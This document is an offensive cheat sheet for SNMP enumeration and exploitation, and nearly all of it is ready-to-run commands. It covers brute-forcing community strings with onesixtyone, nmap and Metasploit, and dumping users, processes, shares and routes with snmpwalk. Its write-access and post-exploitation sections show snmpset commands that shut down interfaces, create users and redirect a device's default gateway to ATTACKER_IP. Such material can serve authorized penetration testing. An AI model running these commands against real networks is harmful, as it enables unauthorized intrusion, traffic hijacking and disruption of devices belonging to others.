SNMP Enumeration
SNMP (Simple Network Management Protocol) enumeration to extract system information, network configuration, and running processes.
Overview
SNMP is commonly found on network devices (routers, switches, printers) and can leak substantial information with default or weak community strings.
Common Ports:
- UDP 161 - SNMP
- UDP 162 - SNMP Trap
SNMP Versions:
- v1 - No encryption, community string in cleartext
- v2c - No encryption, community string in cleartext
- v3 - Encryption and authentication support
Community String Enumeration
Default community strings are often left unchanged.
Common Community Strings
# Common defaults
public # Read-only (most common)
private # Read-write
manager
community
snmp
cisco
admin
administrator
onesixtyone
Fast SNMP scanner for community string enumeration:
# Single target
onesixtyone 192.168.1.1 public
# Network scan with default strings
onesixtyone 192.168.1.0/24
# Custom community string list
onesixtyone -c community.txt 192.168.1.1
# Scan multiple targets
onesixtyone -c community.txt -i targets.txt
# Create community list
cat > community.txt <<EOF
public
private
manager
cisco
admin
secret
community
EOF
snmp-check
# Basic enumeration
snmp-check 192.168.1.1
# Specify community string
snmp-check 192.168.1.1 -c public
# Specify port
snmp-check 192.168.1.1 -c public -p 161
# Save output
snmp-check 192.168.1.1 -c public > output.txt
SNMPwalk
Walk through the entire MIB tree to extract all available information:
# Walk entire MIB tree (v1)
snmpwalk -v1 -c public 192.168.1.1
# Walk entire MIB tree (v2c)
snmpwalk -v2c -c public 192.168.1.1
# System information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1
# User accounts
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25
# Running processes
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2
# Installed software
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.6.3.1.2
# Network interfaces
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.2.2.1.2
# TCP connections
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.6.13.1.3
# Routing table
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.4.21.1.1
# Storage information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.2.3.1.3
Key OID Queries
System Information
# System description
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.1.0
# System uptime
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.3.0
# System contact
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.4.0
# System name
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.5.0
# System location
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.6.0
Windows-Specific OIDs
# User accounts
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25
# Running services
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.3.1.1
# Share information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.27
# Processes
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2
# Process parameters
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.5
# Installed software
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.6.3.1.2
# Local disk information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.2.3.1
Nmap NSE Scripts
# SNMP brute force community strings
nmap -sU -p161 --script snmp-brute 192.168.1.1
# Custom wordlist
nmap -sU -p161 --script snmp-brute --script-args snmp-brute.communitiesdb=community.txt 192.168.1.1
# SNMP system information
nmap -sU -p161 --script snmp-info 192.168.1.1
# SNMP interfaces
nmap -sU -p161 --script snmp-interfaces 192.168.1.1
# SNMP network routes
nmap -sU -p161 --script snmp-netstat 192.168.1.1
# SNMP processes
nmap -sU -p161 --script snmp-processes 192.168.1.1
# SNMP Windows user enumeration
nmap -sU -p161 --script snmp-win32-users 192.168.1.1
# SNMP Windows services
nmap -sU -p161 --script snmp-win32-services 192.168.1.1
# SNMP Windows software
nmap -sU -p161 --script snmp-win32-software 192.168.1.1
# SNMP Windows shares
nmap -sU -p161 --script snmp-win32-shares 192.168.1.1
# All SNMP scripts
nmap -sU -p161 --script "snmp-*" 192.168.1.1
Metasploit Modules
msfconsole
# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.1
set COMMUNITY public
run
# SNMP login scanner
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set PASS_FILE /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
run
# SNMP enumeration (detailed)
use auxiliary/scanner/snmp/snmp_enumshares
set RHOSTS 192.168.1.1
set COMMUNITY public
run
# SNMP enumeration (users and shares)
use auxiliary/scanner/snmp/snmp_enumusers
set RHOSTS 192.168.1.1
set COMMUNITY public
run
SNMPv3 Enumeration
SNMPv3 uses authentication and encryption but can still be enumerated if credentials are weak.
# SNMPv3 with auth and priv
snmpwalk -v3 -l authPriv -u username -a SHA -A authpass -x AES -X privpass 192.168.1.1
# SNMPv3 with only auth
snmpwalk -v3 -l authNoPriv -u username -a SHA -A authpass 192.168.1.1
# SNMPv3 no auth (if allowed)
snmpwalk -v3 -l noAuthNoPriv -u username 192.168.1.1
SNMPv3 Brute Force
# Nmap SNMPv3 enumeration
nmap -sU -p161 --script snmp-brute --script-args snmp-brute.protocol=3 192.168.1.1
# Metasploit SNMPv3 login
use auxiliary/scanner/snmp/snmp_login
set VERSION 3
set USER_FILE users.txt
set PASS_FILE passwords.txt
set RHOSTS 192.168.1.1
run
SNMP Write Access
If you find a read-write community string, you can modify device configuration.
# Test write access (change system contact)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.1.4.0 s "attacker@evil.com"
# Change system name
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.1.5.0 s "pwned"
# Shutdown interface (dangerous!)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.2.2.1.7.1 i 2
# Create user (Windows)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.4.1.77.1.2.25.1.1.testuser s "testuser"
Important MIB OIDs
| OID | Description |
|---|---|
| 1.3.6.1.2.1.1.1.0 | System Description |
| 1.3.6.1.2.1.1.5.0 | System Name |
| 1.3.6.1.2.1.1.6.0 | System Location |
| 1.3.6.1.2.1.1.4.0 | System Contact |
| 1.3.6.1.2.1.2.2.1.2 | Network Interfaces |
| 1.3.6.1.2.1.4.20.1.1 | IP Addresses |
| 1.3.6.1.2.1.4.21.1.1 | Routing Table |
| 1.3.6.1.2.1.6.13.1.3 | TCP Connections |
| 1.3.6.1.2.1.25.4.2.1.2 | Running Processes |
| 1.3.6.1.2.1.25.6.3.1.2 | Installed Software |
| 1.3.6.1.4.1.77.1.2.25 | Windows Users |
| 1.3.6.1.4.1.77.1.2.27 | Windows Shares |
Automated Tools
snmpwn
# Install
git clone https://github.com/hatlord/snmpwn.git
cd snmpwn
# Enumerate
python snmpwn.py -t 192.168.1.1 -c public
Braa
Faster alternative to snmpwalk for bulk queries:
# Install
apt install braa
# Query multiple OIDs
braa public@192.168.1.1:.1.3.6.1.2.1.1.*
# Multiple targets
braa public@192.168.1.1-10:.1.3.6.1.2.1.1.5.0
Python Script Example
#!/usr/bin/env python3
from pysnmp.hlapi import *
def snmp_get(target, community, oid):
iterator = getCmd(
SnmpEngine(),
CommunityData(community),
UdpTransportTarget((target, 161)),
ContextData(),
ObjectType(ObjectIdentity(oid))
)
errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
if errorIndication:
print(f"Error: {errorIndication}")
elif errorStatus:
print(f"Error: {errorStatus}")
else:
for varBind in varBinds:
print(f"{varBind[0]} = {varBind[1]}")
# Usage
snmp_get("192.168.1.1", "public", "1.3.6.1.2.1.1.5.0") # System name
SNMP Enumeration Checklist
# 1. Discover SNMP service
nmap -sU -p161 192.168.1.0/24
# 2. Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1
# 3. Enumerate system info
snmp-check -c public 192.168.1.1
# 4. Extract detailed information
snmpwalk -v2c -c public 192.168.1.1 > snmp_output.txt
# 5. Look for sensitive data in output
grep -i "user\|pass\|admin\|config" snmp_output.txt
# 6. If Windows, enumerate users
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25
# 7. Check for write access
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.1.4.0 s "test"
Post-Exploitation
Modifying Network Configuration
# Change default gateway (dangerous!)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.4.21.1.7.0.0.0.0 a ATTACKER_IP
# Add static route
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.4.21.1.1.NETWORK i 1
Extending Cisco IOS
# Download config via SNMP (Cisco)
snmpget -v2c -c private 192.168.1.1 1.3.6.1.4.1.9.9.96.1.1.1.1.2
# Upload config
# Use SNMP to configure TFTP server, then download malicious config
Common Issues
UDP Timeouts
# Increase timeout
snmpwalk -v2c -c public -t 10 192.168.1.1
# Reduce packet size
snmpwalk -v2c -c public -Cr 10 192.168.1.1
Firewall Blocking
Useful Links
- onesixtyone GitHub
- SNMP MIB Browser
- OID Repository
- SNMP OID Reference
- HackTricks SNMP Pentesting
- SNMP Community Strings List
Quick Reference
# Discover SNMP
nmap -sU -p161 --open 192.168.1.0/24
# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1
# Enumerate everything
snmp-check 192.168.1.1 -c public
# Extract all data
snmpwalk -v2c -c public 192.168.1.1
# Windows users
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25
# Running processes
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2